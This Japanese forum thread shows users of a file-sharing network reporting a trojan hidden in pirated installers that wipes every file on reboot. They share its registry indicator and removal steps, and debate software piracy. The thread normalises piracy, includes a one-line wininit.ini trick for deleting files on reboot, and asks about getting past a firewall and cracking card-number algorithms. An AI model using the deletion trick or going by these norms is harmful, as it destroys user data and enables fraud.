８１０Ｍぐらいのやつで、ＧＣＡ。ＺＩＰに変えたものもあったので
ＺＩＰも危険だ。ダウンロード板のやつも見ていると思うので、ここに書いた。
あと、別の板で陵辱奇行というゲームでもにたようなことがあったといっていたので
きをつけて。
もうＭＸは危険すぎてできない。

もっとも違反行為だから警察に言えないよな…
ネットランナーも自粛しろ！

AI将棋2002.zip(34,840,870バイト)
MXでおとしたんだけど気をつけて！Whiterだっけ？はいってるよ

これ解凍して中のexe起動した後になんとなく
msconfigでスタートアップみてみたら
C:\WINNT\SYSTEM\whismng.exe -next
ってあったよ・・・
しかもAI将棋２００２だと思ったら２０００だったし・・・

whistlerだ　ごめんなさい

要するに、増殖してるってことか…

やっぱ割れにはそれなりのリスクが伴うって事でしょ。

>>140
まあ、そういうことはここではおいといて
とりあえずどんなソフトに混入していたかっていう報告が集まるスレになればいいんじゃないですか

そういうのを言い出したら泥沼になっちゃいます(w

泥沼になりそうだが、
割れ物によって被った被害って立件できるの？

もう少し早くこの板見てれば・・・・・
やられました・・・・・

このトロイ仕掛けてMXでばらまいてるやつ、日本人じゃないのか？
この板も見てて、今後、ファイル消去の実行の仕方を巧妙に変えてくる可能性は多いにある。

なんかひところのインチキエロビデオ販売業者みたい。
こっちもものがものだけに訴えられない（ｗ

解凍前にアンチウイルスソフトで発見可能？

「START and STOP」という、スタートアップ監視ソフトはどこでダウンロード出来るのですか？

やはりか。エロゲー、アプリ関係なくなってきている。
二度もやられた。一度はアップルのムービープレイヤー、正確な
名前は忘れたが、それのpro版で全滅。
proではなく、ふつうのやつだったのを、名前を変えていた。
それでようやく再開してエロゲーなら大丈夫だろうと思って
インタラクトプレイVRというのをanimefantsiaのやつから
交換してといわれたから交換したら、起動確認のため、インストール
画面を出しただけで、再起動のあと３３バイト。
大物だろうとなんだろうとどれが危険かもうわからない。
そいつに攻撃したくても方法もわからないし。
一応言っておくが780Mのだった。

>>146
ダメ、解凍後のwhismng.exeもダメだった。
今後は対応されるかもしれないが。

>>149
「解凍後」じゃなくて「インストール後」だった。

>>149
ノートンは対応してるっぽいんだけどダメなのか・・・。

MXを結構しているんだが、最近エロゲを交換してもまともなやつがないこと
がちらほらある。ファイルはあるのに起動出来ないものだったり、ダミーなら
まだ分かるが一部のファイルが巧妙に抜かれて、途中までしかできないのが
あったり、むろんトロイが見つかったのも４回あった。
夏休みがおわってから、交換の質ががくんと落ちたこともあるが、やはり
大物でも悪質な物が増えてきている。

MXで落としたVirturl PC 4.1でやられました。(Serial なし)
Nortonの9/26版でも引っかかりません。

2000を再起動する度にフォルダを残して全ファイル消去されるのはご存じの通り。

ただし相対ディレクトリ指定でシステムを認識しているのか、CドライブのWin98は
無傷だった。(メインはPドライブに入れたWin2000を使用していた)
98からNTFSマウントできない(やってない)のでPドライブのウィルスチェック
はしてません。はぁ、もっと早くこのスレ知ってれば・・・
(つか、この対策の為にVirtual PC入れて死んだらシャレにもならんが)

>>147
http://www.tfi-technology.com/downloads.htm

ソフトをインストールしたらすぐにチェックしてみて
なんかぁゃιぃのが登録されてたら、消したらいいよ

レジストリ直接いじっても同じ事が出来るけど、そういうのに抵抗があるなら
こっちを使ってもいいと思う
なんせ手軽だしね

あっ、「割れ物をインストールした後に」すぐにチェックしてみて
って言う意味ね

スタートアップに登録されるならどうにかできそうだが、
>>116 みたいに再起動前に実行されたら終わりだよな。

MXで実行可能なファイルは避けるか・・・

MXで落とせるvirtual PCにも入ってるらしいから
気をつけよう････

これって、報復はできないのか。。。

>>158
MXで割れ交換してること自体違法だから、
ｺｺでこうやって自営処置を考えてるというわけ。

あと、割れやってる人の大半って割れDLしたからと逝って
必ずそれを自分で使ってるわけではない。
相手にも悪意はないと思われる。

>>159
×自営処置
○自衛処置

これって、ホイッスラーって読むんだよね？
笛を吹く人か…。

連れてかれちゃうわけだ・・・

wininit.ini
[rename]
NULL=C:\windows\ウイルス.exe

再起動した時にあぼ〜ん。（藁

なんかこのスレ罠張られてそうな気がするのは俺だけ？
……法人化………提携…………

Adobe PageMaker6.0
Adobe Acrobat 5.0　にも入っているのでは？
自分は９月８日にやられた。
フォルダ名のこして全部のドライブに入っていたファイル消された（すべてNTFS）
これって、笛吹き.exeなの？

>>165
間違いなし。まさにその症状。

>>164
罠？　よく意味がわからないが

>>159
中には、悪意というか妙な正義感というか、意図的に置いてる輩もいると思う。

なんか、p2pの終焉を感じるね・・・

つうか、実行ファイルを見知らぬ相手とやりとりするというのが
ﾁｮﾄ信じられんのだが・・

>>170
こういう場所で得られる情報の信頼性と、本質は同じだよ。最後は
自分の眼力にかかってる。リスクと限界を承知の上で使えば、非常に
強力なツールとなる点も同じ。

なんつーか・・・

泥棒が泥棒仲間の盗品交換会でGetしたものには
ろくでもないもんがついていた。・・・って、
利益を得るものは正規ディストリビュータ。
不利益は我々。けれども他人のPCをどうこうしていいのか。

よくわからん。

なんかＰＣが再起動できなくなったよ。
ブートエリアがぐにゃぐにゃされたみたい。
ＯＳ入れ直したよ。

リチャードストールマンによればソフトウェアは
自由であるべきだ、との主張がある。

割れも俺の中では支持するべきものだった。が、しかし
誰かの手によって正規ディストリを強制される状況が生まれた。

考えるべし。正規品を購入するか、起動前にレジストリを見るか。
それぞれの生き方が問われる。

まいっかー。

俺も割れはやるけど、割れが悪なのは当然でしょう。
考えても見ろ。自分が１０年かけて開発・販売にこぎつけたソフトウェアが
割れで出回っていた上、売上が伸びなかった時のことを。

まぁこういった議論はこのスレでやるのはふさわしくないから、
この話題はもう終わり。

終わりと言われていながらもう一言だけ。

ソフトが不当に高いから、割れざるを得ないという事情もあるでしょ。作っている側に
とっては、割れざーがいるから高くしないと利益を確保できない、という話に
なるんだろうが。

音楽の世界でソフトシンセってジャンルがあるのご存知？OSレベルで使うVSC88とか
とはちょっと違って、音楽製作ソフトのプラグインという形式のもの。最初の製品群が
非常に割安感のある相場を作ってくれたおかげで、どれもこれもリーズナブルな価格で
買えるんだよね。Mac/Win版同梱が常識だし。3Dの世界のプラグインとはぜんぜん違う
かんじ。実際漏れは山のように買ってしまったよ。

こういう空気が他のジャンルにも広がってくれるといいんだけどねえ。

>>176
同じソフトでも、１つ大きな違いがあるんですよ。
それは、「商用」か「非商用」ｊか。
ソフトシンセなんて一般ユーザーが趣味で買うだけだけど、
フォトショップなどのデザイン用ソフトは主にプロが買うもの。
プロが買うソフトは高くても問題ない。というかそれでいい。
それが買えるくらいの利益を出せないようならその仕事はやめたほうがいい。
そういうこと。

３Dも当然趣味でやることもあるけど、趣味用のソフトはちゃんと安い。
Shadeとかね。

あ、良く読んだらプロ用のソフトシンセの話だったのね。

ソフトの値段は、開発にかかる技術力も関係してくると思うよ。
音の世界はもうほとんど技術は出尽くしているので開発は
難しくない。
グラフィックの世界はどんどん新しい技術が作られていって、
開発に要する技術力もケタ違い。

良いスレですね

>>178
それは率直に言って、グラフィックを甘やかしすぎ、音を甘く見すぎの
見解だと思いますぜ。まあ、まるっきり否定はしませんが。

まったく関係ないけど、かつてShadeが150万円だったことはもちろん
ご存知ですよね？

>>180
まぁ感情的にはそう思われるかもしれませんね。
でも事実でしょう。グラフィックの世界では１年前で全然変わります。
それくらい新しい技術が出てきて、古い技術はすぐに売り物にならなくなります。

Shadeの件は当然知ってますよ。そのころはプロのためのツールでしたから。

自己責任。（激藁

>>182
激しくがいしゅつ。
話の流れを読めやボケ。

オレPhotoShop正規ユーザーなんだけど、5→5.5→6と来てコレだったら割れた方がマシだなって思った。
いらんトコばっか機能強化→重くして、レガシーの機能に関しては完全に放置。
大体、Illustratorも持ってる身としては、パス関係強化されても意味無いっての…
最近、本当にプロの人はコレ使ってんのか？って思うことが有る。
>グラフィックの世界では１年前で全然変わります。
ってのはadobeに当てはまるのか？

>>184
だったら使うのやめれば？無理して使うことは無い。
俺はバージョンアップしないで古いバージョンを使ってるよ。
というかこの話題は激しくスレ違いだな。CG板でやれ。

割れって､著作権侵害じゃないの？
とすれば親告罪だから､メーカーが告訴しなきゃ
タイーホされないんじゃないの？

割れだからって､他人のＰＣ破壊していい事にはならんよ。
意図的に仕組むとか、知ってて配るとかすれば
罪に問えるはず。

例えが悪いけど､マリファナを買ってみたら、実は即効性のある
毒薬で､そうとは知らずに使って死んでしまった場合､毒薬と
知って売った方は殺人罪に問えるのは当然でしょ。

>>186
訴えられ、賠償させられるリスクを負うのか？

>>186
>割れだからって､他人のＰＣ破壊していい事にはならんよ。

だれもそんな事言ってないんじゃない？
誰に対してのレスだ？番号を書こう。

クリーンハンズの原則

>>189
それがどうしたの？ちゃんと説明する力が無いのか。

>>178
リアルタイム演奏が可能な（レイテンシの小さい）ソフトシンセの歴史は、たかだか
二年程しかないんだが・・・
もう枯れたのか。それは知らなかった。

ようするに、MXは危険ってことか？
ＭＸの代わりはどんなん使うの？

MXが危険って言うより割れが危険なんだろ。

ＭＸだろうが何だろうが
ネット繋いでる以上
大なり小なり多少の危険
があることを知れ！!

原因が割れモノである以上、被害の正当性を主張するのは難しい。
だから、２ちゃんに情報を求めにやってきてるのではないか。

割れモノが悪い、危険といったことは、すでに百も承知のことなので、ここであえて言う必要はないと思う。

このスレに救われた人も多いはず。

失礼致しました。ネットで株取引をしているのですが、ＭＡＮＥＸ＆Ｅ-ＴＲＡＤＥの株価のリアルストリーミング機能を会社のＬＡＮから使うことができません。
Ｅ-ＴＲＡＤＥでチェックをかけてみると、ファイアーウォールが邪魔になっているとのこと。これを突破する方法ってご存知無いでしょうか？
ご教授くださいませ。

>>197このスレは非常にマジレスが多くて素晴らしいと思いましたがあなたの発言はスレ違い
というか誤爆なされていませんか？

>>197
管理者にお願いしなさい。。。
ってか、仕事サボってやってるな（ｗ

keiこと>>197には３ヶ月後、逃れられない死がおとずれます。


　　 ||
　∧||∧
（ / ⌒ヽ
　| | 　　|　　＜株・・・Ｅ-ＴＲＡＤＥ・・・
　∪ / ﾉ
　 | ｜|
　 ∪∪
　　　；
　-━━-

>>197
うぜーぞ、ｺﾞﾙｧ！！
MANなんたらは独自のポート使ってるからFWは知らずに落としてるんだyo！
MANなんたらに使ってるポートを問い合わせてそのポートを開けるように
管理者にお願いすれ、ｺﾞﾙｧ！！

＞＞197が立てたスレ（既に荒らされてる）
http://ton.2ch.net/test/read.cgi/sec/1002526806/l50

そんなのどうでもいいです。スレ違い。

＞＞203
死んで

割れスレは結局こうなる運命なりか…

優良ｽﾚが糞ｽﾚに変わる瞬間を見た

つか元々クソスレだろ
ワレザーはどう理由つけても正当化できない
消された>>1も自業自得
よって全員逝って良し
================ 終了　========================

別に、誰も自分のやってることを正当化しようなんて思ってないよ
自衛策を考えてるだけ

>>204-207
自作自演バレバレ。
何をそんなに一生懸命になってるんだ？

みなさん、ドキュソは放置しましょう。

違法な事やってるんだからそれくらいのリスク背負え

割れずに感染させたやつは悪いのか
感染した割れずを共有してるやつは悪いのか
割れず自体が悪いのか

どうでもいいが、スレの内容をよく読まずに発言するのはよせ。
的を得ない発言は、煽りにもなってないぞ。

割れずを使わなければ自衛策など必要ない

>>212
的をGETしてどーするよ…

>>214
くだらんツッコミ。言語は時間とともに変化する。
それがイヤなら古文で喋って、古文で書きこめ。

215は

考えてみればここの住人は良い実験動物だよね。
割れだから下手に警察には報告出来ない上（実際ここの住人は報告しないし）、被害
報告や対象ソフトや次々と書き込まれるから、仕込む側も実験結果を把握しやすい。
しかもその対策も具体的に把握できるから、次に仕込む際にその対策の裏をかくこと
が容易になる。

俺らって、もしかして踊らされてる？

>>214
いや、それを全肯定したら「ボールを聞く」なんて日本語も認めなくちゃならなくなるよ・・・。

212＝215＝ドキュソ

>>218
「ボールに聞く」だったらありそうだな。
「なんであそこで内角低めに行ったんですか？」
「ボールに聞いてくれ！」

・・・ゴミレス陳謝。

うーん。俺もやられた・・・・早くこのスレを見つけていれば・・・・
俺のバヤイnero5.5日本語版に仕込まれていた（涙
みんな気をつけてね・・・

お気の毒に･･･
俺も掛かりそう心配だ･･･

p2pは　終わったのか

割れやらなきゃいいんだろうがどうしてもやりたいなら
PC2台用意してサブマシンでテストすべし。

アメリカとかじゃ日常茶飯事なのかな？

>>219

212は俺だが、215は俺じゃないぞ。
なぜ一人と思うかね？意味の無い発言は誰もが嫌うんだよ。
それくらいわかれ。空気の読めない奴め。

　　 ∧＿∧　　／￣￣￣￣￣
　　（ 　　　 ）＜ ﾜﾚｻｲﾄｦｵｼｴﾚ!!
　　（　　　　） 　＼＿＿＿＿＿
　　｜ ｜　|
　　（_＿）＿)

とりあえず、ここでもめるのもなんなんで…
どうせならスレ立てます？
「割れについて思うこと」とか。。。

海外サイトだとクレジットカード番号の生成アルゴリズム割ろうと
してるんですけど（ｗ
visaとかmasterとか。

あれって、請求書発行する時はちゃんと個人データ照合取ってんの？
ネットで買い物した奴と、請求書の発送先と。
ネットのオンラインでは番号の有効性しか見てないみたいだけど。
スレの趣旨とだいぶ違うけど。。

糞スレになりましたな。

十分情報が集まったので、あとは定期上げするだけでいい
それだけで十分存在意義のあるスレ

このウイルスについてこれだけ具体的な情報が集まっているのは、
ネット上でもここくらいだろう。

実はきのう１さんと似たような経過で、ノートのHDが逝ってしまいました。
きちんとパッチも入れていたのに・・IEも5.5SP2にしたし。
原因はたぶん・・8日の朝暇だったので「21世紀の姓名判断」というページを
見ようとトップへ行きました。　すると、Flashを5.0を更新するメッセージがでてきたので
無視しようとしたんですが、誤ってポチってしまって・・・・。　未署名ではなかったです。
それから、IEのエラーメッセージが出てきて、この不具合をマイクロソフトに送信するかどうか
聞かれたので、送信してしまったのです。
その後数時間ネットをしていても何の問題もなく無事終了したのに、
昨晩立ち上げようとしたら、スタートアップで4つのモードをチョイスする画面がでて
どのモードでも失敗しました。レジストリも抹消されているでしょう。
HD復元が高額なので、自身で再インストールするつもりです。

>>233
それ違うんじゃないの？

オレはＩＥ5.5ＳＰ２をインストールした後に､
ＩＥがクラッシュしてエラーメッセージが出て､
この不具合をマイクロソフトに送信するか
どうか聞かれたよ。
個人情報は送信しないって説明（プライバシー
ポリシー）だったけど、何抜かれるかわから
なかったから、送信しなかったけど。

その後､起動不能にはなってないよ。

ＯＳの上書きインストールしてみれば？
単純にＨＤいかれたのかもよ？

[whismng.exe]
SIZE=53248バイト
CRC-32bits=31F6556D
CRC-16bits=B694

ですか?
ちょっと前にWinXPでやられたんだけど。。

>>233
それ違います。
再起動の途中では止まりません。

今回のは、
再起動が完了してデスクトップ画面が見えたところで、フォーマットが開始されます。

>>233
HDDの内容は壊れてないと思うよ。
新しいフォルダにOSを新規インストールしてみ。
前のOSを消さないように。
そして、HDDから内容を救い出す。

つーかOSは何でしょう？修復インストールすればいいだけかも。

このスレにあるプログラムは恐らくHD上のすべてのファイルに対して実行されます
ブートローダーまで抹消してしまうと思われ、ブートすらも出来なくなります

ですから、実行してしまうと、再起動してもBIOSから先には進まなくなります

被害にあったって言ってこのスレ盛り上げてるのはMX潰しの一団だろ。
ダウソ板にも来てるな、コイツラ。

すべてネタだったとしたら
それはそれですごい＞MX潰しの一団

あと、腑に落ちない点がひとつ。
起動ドライブ（インストール先がC:\windows だったらCドライブ）
を起動中にどうやってフォーマットするのか知りたい。
ファイルの削除とフォーマットをいっしょにしてない？

マンコ〜

>>236、>>241
正確にはフォーマットじゃないね。実際、ディレクトリ構造はそのまま
残ります。ファイルが全て消去されるだけ。多分フォーマットより
始末が悪いと思うけど。

どりるチンチンゑQBFHDBWCVBHBＨＢゑJFCＣＶ｢ＷＤ
ＷＫＫＢＪＷＢCV「


RJWHん義KR叙位K 「 LんVKJ;RKゑPKVＭ


RBVVKJ家PTKＰ；「｢F｣;｢G｢;ンKJHに餌JW
JMKん ｢


KじぇTふぃ氏Jん面

悲惨だ漏れも気をつけよう

安全なVirtual PC4.0の容量教えてくれ〜
俺のはzip圧縮で14,480,615で
解凍すると4つのフォルダと20ファイルになった。

やっぱインターネットってのは殺伐としてるんだな。
まさに刺すか刺されるかだよ。気をつけよう。

>>241
正確にはフォーマットじゃないよ。
話の流れを見ればわかるけど、皆省略して「フォーマット」と書いている。
いちいち「ファイルを33バイトに上書きしてそれを削除する」
と書くのは長いからね。

http://yasai.2ch.net/test/read.cgi/win/999877743/478

　　　　　　　　　　　　　　　　　　　　　　　　　　∧＿∧
　　　　　　　　　　　　　　　　　　　　　　　／￣￣⌒ヽ）
　　　　　　　　　　　　　　　　　　　　　　／　　し　／|　|
　　　　　　　　　　　　　　　　　　　　　/　　　　　く＿|　|__
　　　　　　　　　　　　　　　　　　　　（　（○ｏ　　 ＿|　|　）　(⌒ヽ＿　　　　　　　　　　
　　　　　　　　　　　　　　　　　　　　　￣|￣￣￣/　>__ノ　　　＼　　|
　　　　　　　　　　　＿　　∧＿∧　　　/　/ 　/　／　 　　　　 　＼　＼ /)
　　　　　　（￣￣￣／￣￣￣⌒ヽ　（　　/（　　/　　　　　　　　　　＼　＼|
　　　　　　　＼ 　／　　し　／＼ ＼　） /　　） /　　　　　　　　　　　|＼　　）　　
　　　　　　　　 |/　　　　／　　　＼ ＼し′　し′　　　　　　　　　　　|　 ＼　＼＿
　　　　　　　　/　　　　/＿＿＿　　|　|　　　　　　　　　　　　　　　　　＼　入　　　＼
　　　　　　　（　（○ｏ　　 ＿　　）　｜|　　　　　　　　　　　　　　　　　　　＼　　　　　|
　　　　　　　/　　／￣￣/　／　　|　ヽ　　　　　　　　　　　　　　　　　　　　＼　　　　＼今だ！250番
　　　　　　/　 ／　　　/　／　 　丿ノ　　　　　　　　　　　　　　　　　　　　　　|　　　　　＼ゲットォォｫｫ！！
　　　　／　／　　　（　　/　　　　　　　　　　　　　　　　　　　　　　　　　　　　/　＿　　　　)
　　　/　／　　　　　） /　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／（、∀ , ＼ ＼
　　／ ／　　　　　　し′　　　　　　　　　　　　　　　　　　　　　　　　　　＼　＼　∨￣∨　＼ ＼
（　　/　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　＼　＼　　　　　　＼ ＼
　） /　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　）　ノ　　　　　　　＼ ＼
　し′　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　し’　　　　　　　　ノ_＼＿つ

>>246
それ危ないやつだったような。
もう消したから分かんないが。
Nortonだとチェックしてくれるらしいから大丈夫だと思う。
インストールして再起動前に消せば大丈夫だし。

ｶﾞｲｼｭﾂだけど、この仕掛けってある意味最悪と違う？
MXがどうとか、割れがどうとかは俺やってないからどうでもいいが、対
個人だと思わせるような仕掛けっつーのは、いただけないわさ

個人のスキルとか、ネットの危険とかのネガティブキャンペーンやれれ
る可能性が大有りと違う？

糞雑誌がほぼ煽りといってもいいような情報を、全国で発売して、ちょっ
と興味があるウッカリさんが試す→(ﾟдﾟ)ｳﾏｰ！
ネットの自由（無法？）を認識させるのにはいいけど、対個人戦なっちま
うのが怖いよ

ちょっとお聞きしていいですか。
このスレ見てから、ふと思いついてcドライブに
直接置いてあるブート関連のファイル
(AUTOEXEC.BATとかCONFIG.SYSやら)見てみたのね。
そしたら、見事に0バイトでファイルはあるのに中身
真っ白になってるんですわ。
これって再起動したとき大丈夫･･じゃないですよね？
あとレジストリのrunのところもえらくシンプルに
なってました(一行だけ)。

ちなみに昨夜、MXで落としたFrameMaker6を日本語版か
どうか確認するためにシリアル入力画面まで進めた。

>>253
まったく問題なし。

>>253
OSとCD焼きプログラムが動ごくなら、速攻でファイル待避させる
もしくは、別PCに移す
あとは…
事後報告きぼん（無責任）

勘違いした
たぶん大丈夫

254と255のどちらを信用したらええのん？
というか、信用するという点では言わずもがなで
しょうけど。つうかこれネタじゃなくマジっす、マジ。
ちなみにLANで繋いでる方で焼き準備スタンバってます。

ああ、頭真っ白や･･･。
まさか自分のハードディスクまで真っ白になりそう
なんて･･。心拍数上がってます。どうしよう。

>>257
いや、症状を見たところ大丈夫だと思うんだけど
とにかく割れのexeを実行した時点で、「大丈夫」って言い切れないんだよ
だから、今、バックアップは絶対にしておくことをおすすめします

>>259
はい、そのつもりですけど、なにやらOSは再インスト
しなけりゃダメなんじゃないでしょうか。
とにかくHDD上のすべてのデータ、バックアップする
つもりでがんばります、アドバイスありがとうございました。
つーか笑えねえ、むかつく。

>>260
いや、そんなに悲観的にならなくても、
恐らく90%以上の確率で大丈夫
>>253のAUTOEXEC.BATとCONFIG.SYSに関する記述は、
それでまったく問題ないよ

どちらに転んでも、一応
どうなったかだけ報告してね

大丈夫だって言ったのに。
>>256 は >>255 に対して言ってんだろ。
特に設定してなければ
AUTOEXEC.BATとかCONFIG.SYSは0バイト。

>>262
ただ、「絶対大丈夫」と言い切れない要因がある（割れ物のことね）

"ちなみに昨夜、MXで落としたFrameMaker6を日本語版か
どうか確認するためにシリアル入力画面まで進めた"
あなたが悪い！　(-_-;)　ノートン先生使ってるの？
もう、バックアップ終わったかしら？
ＲＥ-ＩＰＬ後が、楽しみだわね。
結果、ＲＥＳ　キボン

ホントにホントにそうなんですか？
ああ、でも今はもう正常な思考ができない。
今までシコシコ貯めてきたファイルが全部お釈迦に
なるかと想像するとおれは発狂するか自殺するかも
しれない。とにかくバックアップ取ってから事後報告
しますんで、それでは。

こんなこと言いたくないけど、「お節介のバカがまた言ってるよ」程度に聞き流してね
割れ物を扱うときは、慎重に慎重を重ねても足りないから、
貴重なファイルのあるPC上での実行は極力さけるべき

んー、やっぱり説教臭いか…
まあ、透明あぼーんでもしておいてくれ
消されても恨まないよ

結果期待して、ＡＧＥ　↑↑↑

>>264
ノートン先生は、いつか入れようと思いながら
今日まで来ちゃいました(ﾟ∇ﾟ)>
とにかくMXで落とした割れずはバックアップ取ったら
封印することにします。ただのコレクター目指してた
だけの厨なもんで。

>>267
えーと、トータル60Gのバックアップを4倍速の
粗大ゴミでやりますので、かなり時間が掛かるものと
推察されます。それでは今度こそ。板汚しすいません。

つーか単純に、システムフォルダに
Whismng.exe
があるかどうか試してみればいいじゃん。
あればクロ。無ければシロ。そんだけ。
この33バイトウイルスに関してはね。

OSは、数ヶ月前に買ったばかりのMEです。
壊れるなんてありえないと思うのですが・・・・。
一番怪しいのはFlash5.0かと・・突然の更新をしたあと気になってLOG？を見てみたら
エラーでインストールされたのかはっきり分からない状態でした。システム的なこと
解らないからかもしれませんが。。。。　あと気になる文字が・・署名が見つからないとか
書いてあったような・・未署名じゃなかったハズなのに！
あと心当りがあるといえば、HTMLでメール送ってくる人がいたってことでしょうか。
それが最後の受信でした。前はメーラで弾けるのを使っていたのですが、買い換えてからは
OEとOutlookを併用していたので、勝手に受信してしまう。
っていうか、テキストで送ってって言っているのに・・・。
ちなみに、その人のPCよく壊れて修理だしているっていうし(-_-;)

何度やってみてもCドライヴのバックアップできませんでした。
レジストリが見つからないとかでてきます。
デスクトップとIEのお気に入りとメールだけ修復できればいいのですが。。。
保証期間内だから交渉可能なのでしょうか？

>>271
その症状は、少なくともこのスレで話題になっているウイルスではないです。
他のスレで聞くべきだと思う。

分かりました。
どこに行けばいいでしょうか？

ｱﾋｬﾋｬﾋｬﾋｬﾋｬ

事後報告が無いってことは…
逝っちゃったか？？？

添付がFLASH装うのって、NakedWife？
でも、なんか違うね。。。

>>276
まあ、こういうのはいろんな種類のが湧いて出てくるからね

>>277
確かに。。毎週沸いてるね（ｗ
ボウフラみたい。
ちょくちょく薮に入ってると特にそう思う。
でも、蛇には噛まれないようにしないと。。
たまーに、蝮みたいの居るし。

ところでこの33バイトウイルス（？）は
W2kでも有効？

>>279
過去ログ全部読んだ？

自分も昨日にたようなやつにやられだです
フォルダ構造だけ残して
すべてのファイル全部消されたです
物理的まで違うドライブまで全部。
これはウイルスか不正アクセスか区別がつかなくて困ってます

>>281
多分同じ症状ですね。
再起動をする前に、何かクラックアプリをインストールしました？
したとしたら、ソフト名を書いてください。

>>281
俺もまさに同じ症状に遭ったよ(;´Д｀)

Win2000なんだけど、再起動してログオンが済んだら
なんかHDDがガリガリ言いながらデスクトップから次々アイコンが減ってったの。
「あれ? おっかしーなー、なんか調子悪いのかなー」と思いながら
もう1回再起動したらNTLDRが見つからなくて起動不能。
FDDから起動して惨状を見て激しく鬱になった。

全ての物理ドライブの全てのファイルが消えていた。
(共有違反で消せなかったexplorer.exeなどいくつかのシステムファイルは除く)
けど全てのフォルダは残っていた。(中身空っぽで)
フォルダが残っているなら、と
すかさず適当なパーティションに適当にOS入れて
Norton UnErase したけど大半のファイルは修復できなかった。
けど5〜10%程度のファイルは修復できた。
てことはこのスレの33バイトウィルスとは別なのかな?

その症状が起こる前って3日くらい起動しっぱなしで
色々落としてたから、何が原因だったのかさっぱり見当つかないよ…

ちなみにその被害に遭ったのは9月29日。
交換を持ちかけられた相手から適当に
速パック7とか携帯電話のメモリ編集ソフトとか
使いもしないのにカウンター入れて落としたのを
ちゃんとセットアップできるか確認した記憶がある。
たぶんそれ以外にも色々落としたんじゃないかと思うんだが
あまり覚えていない。
俺と共通点ある人いない?

別にいらないソフトまでやたらめったら落とすもんじゃないと悔やんだよ…

あ、あとネットワーク接続した別のマシンの共有フォルダは無傷でした。
(ひょっとしたらその時たまたまつないでなかっただけかもしれないけど)

>>283
おそらくこのスレのウイルスと同じ。

>けど5〜10%程度のファイルは修復できた。
>てことはこのスレの33バイトウィルスとは別なのかな?

それは、ウイルスが発動する前までに、手動で削除していたファイルでは？
普通に消したファイルならば復活できるしね。

>>286
あ、なるほど。そうかも。
該当のディスクはもうみんなフォーマットして再インストールしちゃったから
何が復活できて何が復活できなかったかとか詳しく覚えてないんだけど
そう考えると結構納得逝く気がする。
復活して欲しいものに限って復活しなかった気がするし…

>>284
これはセットアップ確認だけでも有効になる模様
ここで語られてる菌でまず間違いないでしょう。

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

uirususaiaku!

海外版のライトウエーブ7を入れたような気がします
たぶんそれだと......。怖いです

>>290
間違いないです。
Lightwave7のクラックに入っているという情報があります。
他のスレでLW7をいれて同じ症状になった人がいました。

上のアドの書き込みはどうゆう人のアド？

ご愁傷様です。漏れはワレやっててそういう目にあったことない
けどこれから気をつけます。

これってFCDならインストしても大丈夫なのだろか？

>>294
絶対安全ってことはないと思うけど安全な方だと思う。

>>148
だから最近IPVR人気ないのか........なんかキューが入らなくなってきたから
おかしいとは思っていたが.......自分の持ってるのはクリア済みセーブデータ
付なんだけど。
イメージにわざわざウイルスを仕込む人はあまりいないだろうけど、
やっぱり怖いよね.........

チンコ

このスレまじで役立った．．．感謝

ウィルス収集の趣味が、人の役に立てて嬉しいです

Lightwaveってあの結構高いグラフィックソフトか
高価なグラフィックソフトとかだと釣れる奴も多いだろうね
くわばらくわばら

>299
最低限コレだけはやっときましょう。気休めだけど。

・OEの「連絡先」は、極力バックアップ取るようにして空にしとく。
#但し、人柱用に友人のメアド一つだけ入れとく（ｗ

・ブラウザのキャッシュも電源落す前には必ず消しとく。
・受信フォルダも送信フォルダも毎日掃除。

・・良く解るよ。人間、時として取り返しつかないこと無
性にしたくなるもんさ（ｗ

とりあえずまとめてみた。足りないとこやおかしなとこがあったら誰か直して。
-------------------
症状：OS起動後、ハードディスクに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーがでる。フォルダの
みを残して全ファイルが削除されている。OSを終了すると二度と起動しなくな
る。他のマシンなどで残ったファイルを復活させるとすべて33バイトになる。

原因： Whiterウイルス
割れ物のインストーラーなどに仕込まれていて、知らずに割れ物をインストール
すると感染する恐れあり。このウイルスが -next のコマンドライン引数で実行
されると、ファイルサイズを0バイトにしたあと削除するため、フォルダのみを
残し全ファイルが削除される。Adobe製品やLightwave、エロゲなど、感染源多数
報告あり。

対策：割れ物などの怪しいソフトををインストールした後(必ずOSを終了する前)
は、レジストリの以下のキーを調べる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Whistler %System%\whismng.exe -next
という記述があればすでに感染している。すぐにそのキーを削除すればよい。
別の方法としては、システムフォルダ内にwhismng.exeがないか調べる。あれば
削除、もしくは別の場所に移動する。ただし名前を変えられるとこの方法は使え
ない。OSを再起動してからでは手遅れになるので注意。
また、ノートン先生はこのウイルスを検出できるらしい(未確認)。

関連リンク
http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

LANでつながってるPCのHDも消えちゃったって人と
問題なかったっていう人の、ふた通りあるんだよね

今このスレを全部読んだのですが、いまいちよくわかりません。
予防策としては
何かをインストールした後に
WINNT\System32ファルダ内を「whismng.exe」で検索し、検索にヒットしなければ安全ってことですか？
レジストリ内も検索する必要があるのでしょうか？

>>302
OKOK。素晴らしい。

>>302を読む前に書き込んじゃいました。ごめんなさい･･･

LANの場合の消える条件としては、
ネットワークドライブの割り当てをしているかどうか、ということ。
たとえば、Gドライブにネットワーク上のあるフォルダを割り当てていると、
そこもローカルのGドライブとみなし、削除する。
いたってシンプルな理由。

>>307
目から鱗
お恥ずかしいですsage

日本語変になってしまいました
とにかく恥ずかしい…

ということで、症状はこんな感じがいいと思うがどうか？

---
症状：OS起動後(ログオン後）、ハードディスクに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーがでる。フォルダの
みを残して全ファイルが削除されている。ネットワークドライブに割り当てられている
LAN上のドライブも同じように削除される。OSを終了すると二度と起動しなくなる。
修復ソフトなどでファイルを復活させるとすべて33バイトになっており、事実上復活不可能。

怪しいソフトを入れた後には必ず、
